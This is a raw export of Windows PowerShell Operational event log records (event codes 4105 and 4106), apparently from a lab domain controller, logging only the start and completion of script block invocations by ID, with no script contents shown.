TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469694
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469693
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469692
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469691
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469690
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469689
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469688
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469686
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469684
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469683
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469682
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469681
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469680
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469679
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469678
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469677
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469676
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469675
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469674
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469673
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469672
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469671
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469670
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469669
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469668
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469667
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469666
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469665
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469664
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469662
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469661
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469660
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469659
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469658
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469657
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469656
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469655
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469654
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469653
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469652
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469651
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469650
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469649
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469648
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469647
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469646
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469645
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469644
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469643
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469642
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469641
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469640
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469639
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
